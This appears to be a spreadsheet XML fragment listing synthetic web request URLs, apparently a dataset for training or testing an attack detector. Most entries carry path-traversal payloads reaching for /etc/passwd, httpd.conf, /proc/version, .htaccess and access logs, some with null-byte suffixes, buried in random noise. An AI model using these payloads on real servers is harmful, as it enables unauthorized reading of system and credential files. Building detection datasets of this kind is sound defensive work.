    <t>/2w/tgy5uietpre/t4xvva2mffts/1zshbmo/atoh.jpg?spieeij=sx-zf.rpmh&amp;u2lzi7@3de=rn+edf$&amp;cteeansetnd=844871&amp;a09iylpl=/,,,/nsplos/o3s/passwd&amp;bsr=htpass&amp;oe=r-htpyq]nhttps&amp;wtjwow7t=psxdt+idroetci&amp;se=usbiga3alndtc7&amp;smheriqpltmhc=01291&amp;lahters=sg+/3y\\kskzry6n1&amp;mdmspu6si=13311&amp;xp_lwsuai.u=ityr%hu$&amp;c0ywkkso4=07356926</t>
  </si>
  <si>
    <t>/d7ts0miky0lg2tp0l7hg/e4gbpt7xd1ebtuk/sect/1eeenbfe1eees8arht/vilifysi_6nh/iao/ebhmniiqwheensshc.js?zkvgwraccess_log7=7&amp;rmn0=/etc/httpd/httpd.conf&amp;i1pdeer=9647</t>
  </si>
  <si>
    <t>/wv/pmwewhygyew/elr2atielshamrl/bj3ef0fh/aestylci.htm?ti=62&amp;wbiq2=/,,,/suwbs/rnw/passwd</t>
  </si>
  <si>
    <t>/o57m.qevbu/tndqghwiinianrrnsuy/wbody2wsz_/sua7tsetrnd7eny2s/eymaraaace8lbe/rbdutn57ac/s6q5gs/aygc5tifsvm3inhseezn/hnssqeasreaife09/zxphd/yokzoymu./sbaigtsoum2.cgi?iso22ijia=ehs7mwsys2g&amp;netrpoleiihr=ftp9(w0(+z+nt&gt;aacopyetot&amp;rcd4tiumsihn3=1312427&amp;tombtnd3=cseebenofuneellh&amp;mow1zsebaefe=enrnrneteeore2or&amp;qqnggcjp=se+&amp;cnullr5wy=/etc/passwd&amp;hhrdhewn==nsga48lnoaip+&amp;sxty=tmpfems</t>
  </si>
  <si>
    <t>/srzeiigei7ee/bypwinnttr-_randps8z/59t46eidklz/0i/jnes/pnsh7/ilyk26dny2l0cuffr/ekg-lsso/@olaxatxp_i/1agb-sock_stream2s/4sdwhereo-/3miguodsirniahts.asmx?gibouaoasecpo5g=xe&amp;6ysyrattabt=/etc/httpd/httpd.conf&amp;0atxk=eealhittte4n&amp;iexuttet=+]&amp;e7wlyd=e6so=irelswp-psd[aw&amp;od=dd$retc+&amp;lal7hx=1ebodyscript&amp;nbdeeh=tccmdfxotlesitmasimgxd&amp;vcl_6swahb=oiaryertogahsmaxe1&amp;qx1m8ui19=boot.ini9execfrss&amp;e&lt;naihe&amp;2yldfm5ska-n=1399943&amp;stcaslt=i5oat</t>
  </si>
  <si>
    <t>/eetpcifaogggi/ces46pzym0tiuc/eyw70hdl2d69/z0wxfwglinkrcpyb/cpcmdl/heoeixhsp/f79ch7/dz/gkpghqiragadoov-/kgs2d4hrqi2.gif?csdoapaerahae=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/oho8tlunsepnnu/m.mzfpkb9z.bin?azl71wbams5-=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;i4b-ux=cn-0iloq7vyo&amp;crolkayashm2di=+ne</t>
  </si>
  <si>
    <t>/rtdeesniotnnltxm/zfl_mh0cbmj6xj/mtpcrrco8hettlznna/nnie/ude6agh.bin?tu2aagx=4094426&amp;st=i:/.htaccess~&amp;esa0a8eaztti=i3oe</t>
  </si>
  <si>
    <t>/essseeymnir.pl?scriptxe47=tatsc+5stimloh&amp;divtiktortcad4=&amp;ie6+&amp;&amp;knperlpasswdqj=s-f&amp;xa=../../../../var/log/access_log_x0000_.html&amp;ilhhigtoqt4hr4=2&amp;3t=0722951&amp;n8sots5fte=e3tsekt&gt;+wu;w;d$</t>
  </si>
  <si>
    <t>/clsqoeeibae1ria2.js?temlrspi=iyvptzns-l&amp;diuibi=mhlike6&amp;reodgnncaa=/etc/passwd</t>
  </si>
  <si>
    <t>/jnzbrkbxq-wox.c/hqelu5cintee0csx7/eerasn3ott/75onoas/j2iejewspow6tieliypt/itsnin9ttehcs/zlp/6e4ugq/f5br.shtml?ta=../../../../../../../../../etc/passwd&amp;zw5y-=613603&amp;tmittshtwa=sunionechosteeevalentrwwentz0</t>
  </si>
  <si>
    <t>/hlpt/eahzoq3cw/ueeyooeq1rtiet/cjx7maxu2lpf/fngafwqteaeeoinoe/mmekkk/edhooizqh9n5@wtp4p/wo2nabqddyvgg.tiff?inon7amrtc3oj=57080&amp;@jse8mc=?d6y&amp;dgmatudavwoeo=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>/vpm/x37li/g.pof/acczyp.g_wy8llgk/oczghdl/cybv7hl/dmq3eoheea3njiu5st.shtml?toebarr=/etc/passwd&amp;9xkdzermwdeleteyew=rlatne&amp;etlossszren=93&amp;osmxtayoso1snf=603&amp;maowirioit=5633&amp;sesimrhaelhioe=3</t>
  </si>
  <si>
    <t>/5sredfnucaa0i/seonedrn9ebah4/lyunoomed/ueoo/olocationmunionggvahtpasszaccepte/sq_eeegzey@p6ae.pl?nen=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;hediprsy=ayrdsepht&amp;cp=496</t>
  </si>
  <si>
    <t>/efegig0w19mnewyl/4os.htm?uviuwtz.3be=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;vio8eme=azoa&amp;reghwe=kivz2ha8e3ll</t>
  </si>
  <si>
    <t>/9fszmdvczsgr/m7qtkykgqxikquz8w8/2i7asrdha34zafbed/sl1b/ervu_wwfelqv-4nrzrhv/xmessano5i1mug9ie/ouedzbsbte.php4?ttlhdnrasiotind=o:/.htaccess~&amp;ihh7ta7he6ne=srmetjsflbres3&amp;aeu=drtaozuss&amp;rpscee=htpasseodas&amp;tc3ql3smnna=sl3zeywkdfd&amp;ymnyyataahrja=dusa&amp;ios4q1nyirisedw=ml05yr2&amp;sdriewrot=3199418072&amp;rtmpj_0=x4fj8d&amp;aldbhelp3fyslu=eeifncdemtpat&amp;annoeheggcckaei=\\fouj&amp;9sd3=913560262&amp;zwgatrz=m69e&amp;1.rx6s2=108&amp;exwindow.opengb=85527561</t>
  </si>
  <si>
    <t>/ttqi_7p5-.9yyea/o2nna.skrl3.jsp?5eatia=l:/.htaccess~&amp;fndnnebsc=1574145&amp;nc3ucwynw=dkcrdosn</t>
  </si>
  <si>
    <t>/ps/rjdlohhs/ks5bodyz8tcndzz/pmsmhwn0uv2vmz/od7wr8.zvb37siza/hspkxomyqmcqu/xu/s7r3gihirot/iqxnq22b3mvb6my_no7/egt3dnfv9vziu..dll?peqiilddlear=21590&amp;hai=/etc/passwd&amp;gnhderhn3f8cspd=34&amp;qlperlnmwgetvf_ziframec=7&amp;walcaesqht=0np;[m&amp;8teybxtsmhwrfe=4e1&amp;ahyusi6msa5ndee=v3go&amp;cteftje=swop9&amp;0deoiaew0t=szcsa_&amp;iqovfblebsu=8846</t>
  </si>
  <si>
    <t>/kh.tiff?6hjxmgkh=cecius0&amp;ldwnal=\\.\\.\\/\\.\\.\\/etc\\/at.conf</t>
  </si>
  <si>
    <t>/cph_bphljt74bynyp/ra5g7roelspie/lqx2@h@fzax1lm/thergs/h.xupx0oz590g/sdosmelh_5uzrfcj/owiaeavvdiogceo.swf?nlartn3snrcrt=552884&amp;ic3esilh5etybos=tborupomoeysvirdmaileee&amp;nlrerix=/etc/passwd&amp;l4ovh=295&amp;beceledernoia=hoysftihhe&amp;e5qhe4=106&amp;heuoox1=csbtoniar+feiidiv/5&amp;puyyfy=l0ivsxguc6s</t>
  </si>
  <si>
    <t>/l2egxxklwg/wqbqee7ueee/uzgtvqvi4zbcar/rf7masrd4kg@9zs1ub/nujrwknk/tht9iu9gdk4/l6diod.gif?omt=../../../../../../../../../etc/passwd&amp;zprocalibeqm=r8yv&amp;eqsozrt0nn=0544321382</t>
  </si>
  <si>
    <t>/mjw5usp2rdibo.cfm?tfe=0qdqq&amp;weoghtesepsgev=nmrseufp�&amp;ntllte=seg9jt5semll9x&amp;ahttps2pmyqiwoptp=ee0ebody+t?atpassthrud+bin2ise\\&amp;lwne9t=ttkoa0shqaccess_logiod3nt&lt;&amp;ewrtrk1s=../../../../var/log/access_log_x0000_.html&amp;no1no3umosaes=~ad&amp;aa9ycr3=4&amp;childa_w-xwxm=50612397&amp;fht5a5tu=iframe)sandietsfbrie6ui&amp;etetwtgc=mgd-reeslibschw&amp;tech7tne=irciehn0tgddhho</t>
  </si>
  <si>
    <t>/ebp1p0dkpsetsws3wzik/o7bmn_2g/tw8odsy.n4wo_iya_b/idwinntt6hcb-b/divayexecoptpmpjc/8bybbgsound2qeroje/jsswxujrsc9/lele/hf/8nulld48rmw5c.jpeg?f3npfkcsk0=rdi9033t+&amp;nhhenl=3062623&amp;ttuy=mu&amp;hd=umedstaieehttmnrce&amp;ehht=5ieodcu&amp;hnwmiup=79065&amp;9itsecfev_=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;dlcrelminga=rsrwsr3&amp;inmthtz=4fsao2trylref&amp;xzypzc=fehoesetecow&amp;ger=li0&amp;ttv4g6=urstb7iailtssfee&amp;hoeroeoer6eenee=11940&amp;ta7=44292</t>
  </si>
  <si>
    <t>/t1xwuxpt9qtx_kx/laed/pzfrgy9.czi/igft6esvjohaw/we/cdg0d/fapbee67hj/whgqq2sins3f-lyucv/hlbyjbvm8/m6ck1zml.gif?ehe=331728&amp;rtt=2567017428&amp;ee2eosee2ac52oj=daosrnoin&amp;tlur=../../../../../../../../../etc/passwd&amp;oqbqxtermn=1wftcmjps&amp;bnullnle=zoaccess_logsv&amp;i3foydr=document&gt;pn&amp;chpux-jrh=a0e&amp;dhyer=7)oo:as\\im+e&amp;hes=02</t>
  </si>
  <si>
    <t>/ra/wrt5ie9ekoatbt/qh/nvhpur36d@7k5umj2f/xterbi0eapsu/xrhbnatucsedsa78my/a4occh_6tcwvelv6p8b/ieomce6ap1a4d/-xsxvevf-pht/reedysatghrl/9dm.tiff?qnvscriptc2=y-g17dttb&amp;alsbsn=tpnetlyve&amp;wjaatsmadgxfoo=esrk&amp;vwdandukqkeh=iagefth&amp;nigp=el9cg+eoaoa+&amp;5lrna7=nbfi&amp;syyml=nrtftnhwoam&amp;qoanaohhodk=hhrnbudo&amp;ebnkenyir5ranc=811141962&amp;9itomfs=\\.\\.\\/\\.\\.\\/etc\\/oio6.conf&amp;eia6feeaz=ernnaamhdwi&amp;esaznarrhc6tor=7&amp;utsfa=tw|gr&amp;lududans=rhubipe</t>
  </si>
  <si>
    <t>/scoedgu5re/ncc0etl./osire8lcruhainloetnp/ealyg-ltuxtermlv/jn_dcegjjq1@kg/s4qqmo/oincludelstyleiaqa6y-l3ga/ohinoveieynt3iieevi.jpg?tdnoim1nr=xyidothorekpsjwr&amp;1xcwaq=t7oaxjo&amp;4jzft=yi&amp;0yxsock_stream3s4f=i)idk1+t&amp;eeuoou=3x&amp;3srra=521&amp;gf3faewsofp6=tmjhjdzf&amp;yoemwnrd=7536&amp;iaebaeicghof=../../../../var/log/access_log_x0000_.html&amp;replaceh.vincludegjvzui=nq+t&amp;zpewrse0=nh5jtflpn&amp;mih8nea=tk&lt;xtermrtiit0woz</t>
  </si>
  <si>
    <t>/ne/aqm5wc/pajo1z9ewq2zqe/qy-gm/cteiscn5beooe/evmd7nd9sv1/8oriobhxseta/5dfzroicatac/rxaomarlog/o42krs5ihxrm.mdu_/et2itvefnaawnet.msf?iht61nafccvnhno=9918&amp;uetcjj.pa0sformq=/etc/passwd&amp;xcy30vouuqr=1:</t>
  </si>
  <si>
    <t>/p0dvj3p976z/r0@kvvjfcdz/8l7aoxn8dmkrcrl/awzqgdja5j2uw41fy/mne6teuifrvgendt/6nttiacccsodm4eoraeu.sh?dn1plaeoe6htarl=79iasrffnhocet1t&amp;s0ptfmo-yks=cr2&amp;cl=$&amp;lmreolvtnyr=aatdwpa&amp;oeszlexmzm=../../../../../../../../../etc/passwd&amp;tmeetan=se&amp;aec=syag81ioismh&amp;tipoh=akzd&amp;lntwgsxdc=shutdowncx%ui&amp;tlett=4ltha&amp;ofoavhsit=8781271429</t>
  </si>
  <si>
    <t>/vgpstoreeeskviot/copyyidk7jgoxfhtaccesnu/rjm/rl/auodxodpg23e/iu/0exa/svavfklcbr23h/cyqpmi-is_5gd@j.612.css?7enbo=x89zto4ttcea&amp;oouv7g=/etc/httpd/httpd.conf</t>
  </si>
  <si>
    <t>/yefwtst/gjnu/fealtlsohd9uaepaanrg/eodde9ktinpheeli/stdinypkmeil8access_log-p7/rzx/70nm/e2muijattc/dmtzadlehotl/tlhtrld6rbc72irs9i/tex.hqomz0aslw80nlen.tiff?ib8vw=065&amp;eiytrigzoa3=ifr&amp;zzvptf=239085255&amp;uilaisnniuo=accs&amp;pen5yt3eesare=ori7s+ytoegewve&amp;teime=85176648&amp;tsnyieoat=7ohyt&amp;laroxett=ebmyrhdcm&amp;l5=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;4l8doeqeomnx17e=hektrstrn&amp;y8mail0dm.=&amp;ke&amp;qo0okersn=ergdefbs&amp;n33t.fwidro=ilncr&amp;3noe=22</t>
  </si>
  <si>
    <t>/vresumcm/iitp0qettterfh5.dll?euwt2hjselectmtdw=sadjcyhu&amp;yihz=8026205&amp;otlp=../../../../../../../../../etc/passwd&amp;h0=tuifostethfmsmqe&amp;kshne=nohtv1awp-faaidroplzhe@&amp;g0qztatol=sg]r</t>
  </si>
  <si>
    <t>/amh-og8a7rebft/spud0tmpxibetween.jpg?qgr5rro3saokgm=3s++s&amp;_mochaxncas0d=iilocation+lo+vur&amp;oyrsythnr=ys5fxwrxjp@&amp;7e69cscno=ez3j0vdk2xau&amp;pndf=ti&amp;d4raun=airo&amp;e7re4sb0ar=../../../../../../proc/version&amp;dacrtgr=d&lt;nnpswindow.opentnetcat</t>
  </si>
  <si>
    <t>/i5mv-rhbsbwfy/qd3id5.exe?mes=~raobjectn:oebgroup+byn&amp;p3autikstd=yi&amp;titlhnydknhdr=d:/.htaccess~&amp;nk05h=7379&amp;jt7ast=leh8dahdqost&amp;iie=e$a</t>
  </si>
  <si>
    <t>/nut12/eyqskk0amuvb/ccaf/z_kt/mtsaadibihrcj5hge9.msf?2enso=\\se0srranam&amp;tnsestzsn8ae=uee8eewd&amp;atrcbvht=7nuicz+=tpy)c9owqb&amp;habi=f2i5t3qg&amp;bree=../../../../../../proc/version</t>
  </si>
  <si>
    <t>/ue/oxoiem/oiyneepgk58zsg8ctwss/he7ryftf/bhbsvlzl.css?dsin0aa9lwoy=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;9n=qm3eeufht&amp;64lpmm=bd&amp;easaythbetqo=5228776975&amp;ytzblisoonjtsin=52&amp;oltvhtpasswohe4g=4355982&amp;2cs=opt</t>
  </si>
  <si>
    <t>/tunull2e@adminjuzb.png?te2eeahi=0porelgqi2nien&amp;zh7tg2bes=ecioelxt&amp;hrblanmsnea=s2m&amp;no8rt7eaadotte=/,,,/eitp/m5ss/passwd&amp;juulmmntxt=1853431&amp;heiaaaehe1s1=4575</t>
  </si>
  <si>
    <t>/a1/tq/vbscript.ecqnk8c1/o-5/ta.unojdirod/eosinmmnel9dcsesue.exe?ebs3e1=853&amp;m7=6lda+aio&amp;mf6iasiol=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;cti7mws=yistheidi&amp;wardnocadlboesh=adtenbemlml</t>
  </si>
  <si>
    <t>/@pdiver8tohttplhgw6l/a2es/eenthuo4vee/538ionitkb/ehagxsc6tiemtor6ox/vwservices/wewugadmin9_v/opavk4fyx/ha3ftvknrroabdotp.gif?tszgdwl=877331&amp;av5glybp=uomeatj0tuwj&amp;ea8oe1tdd=695652240&amp;trtdnesu8as=pfeeeww+59script&gt;&amp;otyepa7=\\tmpjs&amp;&amp;rzadl4boh.r4=../../../../../../../../../etc/passwd&amp;fdnk_o2tsa8=snt&amp;nt9rtnuak4=sho&amp;eigoeikhalae=694&amp;htt=77540&amp;uvbscriptw-7kmvjuq=1&amp;-stdiniu=ciw@&amp;2iaace=retomt+t</t>
  </si>
  <si>
    <t>/nht/2qrmotl@ivivgr/tycocyd@/fk4x/f1etrxwshpji5.php?nmlanetgnyh1kt=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;roe=4&amp;mtpa6naiaidr=+[t:+hei03\\h$j</t>
  </si>
  <si>
    <t>/ilsxt-8/sgf66qbcb66lb/sgodda5tasej/mcopyo/c.km79zqghxc/oipd/trlos3drciienhms/ruygp/4voyvecsi0n.cgi?eniunoxogl=mo:|&amp;4ihrchildc=+]bnsstdin+fhke&amp;1v4w2demspef6k=\\.\\.\\/\\.\\.\\/etc\\/passwd</t>
  </si>
  <si>
    <t>/ofpoudnooi/esqrv05t7_cm2suisx/64ht.php3?ur=t&amp;mma8oy2le6xmreh=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;lt=tmochaw'</t>
  </si>
  <si>
    <t>/gxseufl3uifmvawals/ezyidc/.ail130/atmp1o2o/pynph-wluxltelnet/ttshssna5p/noto/ysr/rfs.gif?yrtn2=m2a&amp;b7ersaaloctvai=/etc/passwd&amp;asno8sh=~&gt;i4d1mz8prwlt</t>
  </si>
  <si>
    <t>/varstcssso7.gif?4nadi=7iiotntepotnoieed&amp;hew=/etc/httpd/httpd.conf</t>
  </si>
  <si>
    <t>/d_/myj/vsiroeehtt/kyidwghxhtt-t4pk3e/ueeea5r34cirlxee/sezwjxi.dll?eiiewo=/etc/passwd&amp;imzeijd=ccufpdb&amp;iiteigehiq0l=t2i+n@&amp;wenmda=7535716&amp;etwt3ekf=41484</t>
  </si>
  <si>
    <t>/qegycvn5p/pd/es/0srftehtr0eeur/zbjk9/h_ajkpttmdggts5p/roycdmvrnjmotb7/n9_l7ctwmyadu9bjpenw/snrmee4raan/icuxgwqqdhjl1kw5.jpg?nernenueniai=pied-nhwlsoet&amp;j1i.r=gsst/imgieoetnahn&lt;&amp;iobpwy9is=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;8cha=635&amp;rre=aw2&amp;eh4o=a&amp;o8ici3s=2&amp;si1ujatr=91&amp;beuahoool2=mm'as(wen9-:ascript&amp;azanie=+&amp;%[</t>
  </si>
  <si>
    <t>/rt2k6su-5q9lsd/fawtcjebgrbjvsbiw.png?srdchso=w&amp;al72gzkk=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;nwhatetaaehwtw=mut&lt;l+foshutdownr&amp;yaten=ev6za&amp;ulyoes=9r+e&amp;rethrc?:oevariw&amp;0gta8=aaegmeshesugihe&amp;tmncnowfbotro=nwab3me_k&amp;gupa25b=w&amp;neeo3=9049514&amp;66ym.hdl_rk0=5</t>
  </si>
  <si>
    <t>/t@8sdeuln/ie5wv/shxz6xt.2qmb/ns/n0gy0xoh3n8/ic_qtux9btexk0gn/nxjdw33chnjhecho9s.php?ieimean=ihne&amp;tjr0uagcr=/etc/passwd&amp;l4mouh3ab=19506925&amp;5urr=ra&amp;ryr-=nph-rk</t>
  </si>
  <si>
    <t>/dx.4vh7kcesryzn/palah/ifhewn/reehynmne9sfsyofvboa/eklgtag/pc1auegsstisyqo/aya/dntwlabhe/s5saeehtsjid/fkmn.hzxpwdv.asmx?ithhagiaremnnt=nodea7uperlttz+fy/$&amp;dttaient=../../../../../../proc/version&amp;se=r1y.a.1dwuuw&amp;j1jrbtgf=xrysdac42&amp;paakqin=200&amp;ntoipathq=:s&amp;etswtmtsph=3893&amp;v7ucmd%uaqm=+&amp;mtiinpaseh=positionr;</t>
  </si>
  <si>
    <t>/ry5oept.css?o8smaijcrt=3g_s0i&amp;aa2lneteoa=:stlscript+oc[ua&lt;6evd&amp;rdx3eb9oh8o0wnc=copytcnwheresudy&amp;esycl=olatdeeapoheelaac&amp;rrsqtt=r.liufpa&amp;hial1tlrl=hnnode407edocumentegdiecho]&amp;hrwen2lcvolgge=\\.\\.\\/\\.\\.\\/etc\\/tdemmn.conf&amp;tt9=021</t>
  </si>
  <si>
    <t>/anoi4tn3eiljp/hukdapek8f7z8yzv/ox.n-gwu.shtml?tfa7eu=x&amp;ixexshlb62=06491&amp;hnr3xsafrniuruo=etlaruw91h&amp;pt6omaqetrshgwq=../../../../../../../../../etc/passwd&amp;1ttrtascit9=861787&amp;rrtso6belt=vjise1n6&amp;5vbscriptjwz@x2j@=81&amp;nurhttrestbwebg=aefe+es&amp;susrjiim6ayxf=48</t>
  </si>
  <si>
    <t>/oaizp3/fdwqwqsuj/e_sx8ctnp4blw/g2@v7@y/qk./opcoqdapealeuem9s90/oudbajnu07abj@oamw.mspx?.3fromj=0949&amp;atnaiter=+e&amp;y.hua.=replace+8g&amp;eerehrya=k+2ia&amp;leval5nluxmail64-z=8521228161&amp;njrocyhira=../../../../../../proc/version&amp;sd=ter</t>
  </si>
  <si>
    <t>/lfnucj8tszl@wvewq/viojgrconnectyo/oxrtoxvuk5w/tassir0oeieaqt/vgjghww9/gqvpx/4gnsmmd/oalwlt/uqvrm5zn/d@wpmn70ohdlt79ng/to2deb/hripso.asp?eena=1v6yb6r&amp;tc=748&amp;uni=okwgroup+by&amp;y.am6foc1binputd=oebirbgsoundondelete&amp;4i=300985&amp;nquniondiu=3&amp;etcz-y8qejxcz=a$&amp;n6pct=fdeshem7&amp;etns]l&amp;tm7-fopenpua8lm=e&lt;tkscriptmybl6+o&amp;ahnl6swysiset=we&amp;0am7lxaeeie=pyuj1z3jm&amp;lsykftp2cldl6n=m0efhewfd5oaapy&amp;4eeeeci=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;taxt4mless=o&amp;heg=~y59di+zq</t>
  </si>
  <si>
    <t>/ennebti/_rcpdropegpi2mailkg-8pe/eyoxsita7ircm/brolt/5xvhgnfotq_ujvqpaf/7mk/eshutdownmawuqkcopyqb/0ygbr_ttu5j.is8mlvb/8a5le9dinputulncwhqk.html?cisoeeeb0h=o:/.htaccess~</t>
  </si>
  <si>
    <t>/haiefis/o7.kmusp6@.dz6gy.sh?ptgam8nk7l=5229959&amp;slocationafdmochawhereo-gs=34282&amp;4hmowaemihlis=bt&amp;enaajh9dnrog65=asvltb&amp;b9pioa-_phttpg=hlogindf&amp;ypeiobaq7tan=e&amp;e_b0qr8mtxhh=wewwen2oatmh&amp;dpavnu=rgvrtq1tirqn&amp;zeiwltal=../../../../../../../../../etc/passwd&amp;isa7uspaalapio=9x&amp;ewwdroppb=+openy&amp;unh=)l&amp;zudnybntigp4sir=ayo8flqb&amp;position0c5d=ann</t>
  </si>
  <si>
    <t>/formmeta1x5pm5pautoexec_/otifrujuoz8wymkar/e1bw/tm2h-.-7gcjabdz/b7vzamqjwindow.openv/xrcfdi/0ckybp.es8egt9ovcc.jpg?aefola3t1v=3ayya&amp;ntabuang2nc=s:/.htaccess~</t>
  </si>
  <si>
    <t>/laaioktrraqacuoh/elpunitxmb.jpeg?caym8pos=583923&amp;5s4hmetsrtsx=yl9legvo0bhh&amp;mnlsmuimltsdy=29&amp;e5d8acs6gri=984476&amp;o2nhe8aterna=805474&amp;dgh=ium&amp;c5jodg83g0=47&amp;aloiqqswbd=hkau4o&amp;ii5uruayr=253&amp;ojuo5ropetpsor=rrobsni&amp;7nm0mh=r&amp;hsolyaeepy4tas=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;0fojab@ou=rubnnxayuj&amp;r0hknecho=lgoaccept</t>
  </si>
  <si>
    <t>/fsh7mbc/acrijt@j34ln/i8rlnwsnrfebi/hbq4yowflrhdn_jq/a1hynl8ea5bnse8t7t/1gezhz3/m37_hzeujm1--5qw3/d0dy1zwypefq.tiff?g1on=om4wvxj_kb@z&amp;rt=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/rezvc3pwutaxsvlie3zx/nd/5pe@rv-9yn0egauo.dll?oouheonh3l5v=1)ifyne0h&amp;tdntgdi5hlefbme=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;syhmm3sl2d=t%uuadmin|i�ui</t>
  </si>
  <si>
    <t>/reteraoi8/svupdateallw/eohwmeemr/usliiea6otnss1rkswo/0nnbekau/o_duld_cc/tzptolhqahie/jjnetcatdgop_v/0duq/bsvsn/bhtl/s5fe.msf?jde2nho=i]bo&amp;inicusoucccne8=unajtgan5&amp;oucldoistoo=2598&amp;uourhbtbitpssb=081&amp;snyt=c0eh6qea&amp;naeb0gntualyaen=nqr&amp;nhrsu=270033&amp;iyvhr=ne</t>
  </si>
  <si>
    <t>/ecrk6/nei.jpg?emtugir=1999&amp;ec7nin7seiee6ai=52371&amp;lt7ymsghhildtui=7&amp;hteiea=9625&amp;euhhhcre=h&gt;shutdown8c</t>
  </si>
  <si>
    <t>/m5-harbczqcw/t0kcmxtco/i9ch/g.wk.mspx?fnhrvyr=fiyebn10d)mrnsr&amp;kul3rd=osotleexab4&amp;ketptobtds1=dao&amp;caers3ne=yoti&amp;sc91d0setrre=c9ns&amp;dcc59eomabsnue=gl8zcurv.&amp;emsdral7=ttatosa&amp;t3[lsl&amp;btiivcegufhitl=307&amp;ae=vmfxmg-&amp;et8thohwi9tfaut=-ypws+t$telnethk&amp;rpositionoe&amp;maaoshtnaioomme=ovc0y-rjr</t>
  </si>
  <si>
    <t>/stfc/wop@perl7y6bc.js?kgbzsy=s&amp;betui=rfs&amp;noz8ie=9137&amp;pesa2nn=n7yh65xterm2zhsh&amp;rcmiefcrdamil=tfl3fel9uc90&amp;epyeerhinng0tf=240287&amp;doe=+e%miobad&amp;r0nepdnsen4ao=a9&amp;nttogpwsihs=57721&amp;shivriwiohht=+es</t>
  </si>
  <si>
    <t>/ha33h7tdf2khttpsu/eeyfsz3fy/mhgtea5/.connectjbpasswdw4z2o4/efkb.-ikufpb9rhpwc/2ozc4zl0zyi-ou/gl/chttayozakp.jpg?fbyvtv=695188</t>
  </si>
  <si>
    <t>/xp9opswfrrt/nidirk3onnssegednbs/z4xscw/hvsw.motwftnhu_wcr/iisiaebkntefince6/nzmawv6maglolpik/0hlg2ojmieustsnbksiy/t-op/oj4zeg/oissh/06r/iermiuou8e2x.jsp?ybvbscripti=0&amp;ohueeewlte=7php&amp;sltsuojd=site9certq&amp;pyeeih=mekawgv&amp;doeeu3qddfeys=5qole&amp;kze=ea3ihomes\\o+nphpput&amp;eedoo=099045560&amp;aaia=grs1xerdnta6m</t>
  </si>
  <si>
    <t>/enlits4se/tfetnds7h.html?8qklypsn=292&amp;ritlunieesal8i=teop&amp;@kjx=lmetaf&amp;odrat=elesgntewegjeqowri&amp;nmhttpse5vrcp=aua&amp;ee9te=7qu2stnaih&amp;cn4ice6leknfd=975&amp;szhttpsegroupbyepav=9&amp;n84mnecnaplns1n=7ev1fvkq&amp;aktgatosrh=6q&amp;4t3nuq2ntl=3yyu8oc.mi&amp;eeeabinyts6=47</t>
  </si>
  <si>
    <t>/cfe.html?tot=0217&amp;fn6bsptt70a2=neezh&amp;a3hmnspireyuxh=edqsuzw&amp;0dteiurzgfrte=ifys&amp;ran7mkzzhnw=823&amp;sb=682</t>
  </si>
  <si>
    <t>/ee/gztqeerooar1thgnlnai/geeot/pnd/fznyevalpa8yj24tb/unml7xehfwi/rsgtumyoth.cfm?jtoz9txx7os=oc&amp;csnmlivzccq=]aheesse)etsr</t>
  </si>
  <si>
    <t>/eqgb/bp/sxqnttzvdigj4lcd2q0q/_bv2txqpvnf/na.php4?0thaeuyt1=caccess_logrsnrd</t>
  </si>
  <si>
